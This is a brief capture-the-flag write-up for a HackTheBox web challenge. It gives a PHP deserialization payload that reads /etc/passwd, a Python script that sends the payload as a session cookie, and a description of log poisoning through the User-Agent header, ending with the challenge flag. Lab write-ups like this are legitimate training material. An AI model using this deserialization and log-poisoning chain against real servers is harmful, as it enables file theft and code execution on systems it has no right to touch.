Toxic | HTB Web Challenge

Web

In the given source code we can spot that it is vulnerable to deserialization

PageModel have magic method __destruct() to exploite Deserialization

payload=

O:9:"PageModel":1:{s:4:"file";s:11:"/etc/passwd";}

import requests
from itsdangerous import base64_encode

a = "PageModel"
b = "/etc/passwd"
payload = 'O:'+str(len(a))+':"'+a+'":1:{s:4:"file";s:'+str(len(b))+':"'+b+'";}'
payload = base64_encode(payload).decode()
r = requests.get("http://83.136.249.57:52345/",cookies={"PHPSESSID": payload},proxies={"http":"http://127.0.0.1:8080/"})
print(r.text)

The flag name is random so we need to find a way around

we can find the path of /etc/nginx/nginx.conf in Dockerfile

Reading this file we get the path to access log /var/log/nginx/access.log

In access log we see that User-agent is printed

We can try injecting php code:

and it works 🥲 Let's get flag

Flag: HTB{P0i5on_1n_Cyb3r_W4rF4R3?!}

:octocat: Happy Hacking :octocat: